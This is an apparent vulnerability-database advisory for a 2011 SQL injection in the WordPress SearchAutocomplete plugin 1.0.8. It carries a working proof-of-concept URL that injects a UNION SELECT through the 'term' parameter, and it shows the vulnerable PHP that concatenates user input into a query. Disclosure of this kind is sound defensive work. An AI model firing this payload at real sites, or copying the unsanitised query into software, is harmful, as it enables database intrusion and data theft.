WordPress SearchAutocomplete plugin

vendor:

SearchAutocomplete

by:

Miroslav Stampar

CVSS

HIGH

SQL Injection

CWE

Product Name: SearchAutocomplete

Affected Version From: 1.0.8

Affected Version To: 1.0.8

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:searchautocomplete

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2011

WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability

The vulnerability exists due to insufficient filtration of user-supplied data passed via the 'term' parameter to '/wp-content/plugins/search-autocomplete/includes/tags.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary SQL commands in application's database, cause disclosure of sensitive information, modify data and compromise vulnerable application.

Mitigation:

Ensure that user-supplied data is properly sanitized and filtered before passing it to the vulnerable script.

Source

Exploit-DB raw data:

# Exploit Title: WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability
# Date: 2011-09-01
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/search-autocomplete.zip
# Version: 1.0.8 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1' UNION ALL SELECT CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4--%20

---------------
Vulnerable code
---------------
if ($_GET['term'] != '') {
...
$titles = $wpdb->get_results("SELECT post_title As name, ID as post_id, guid AS url, 1 cnt FROM ".$wpdb->prefix."posts t WHERE post_status='publish' and (post_type='post' OR post_type='page') and post_date < NOW() and post_title LIKE '%".$_GET['term']."%' ORDER BY post_title");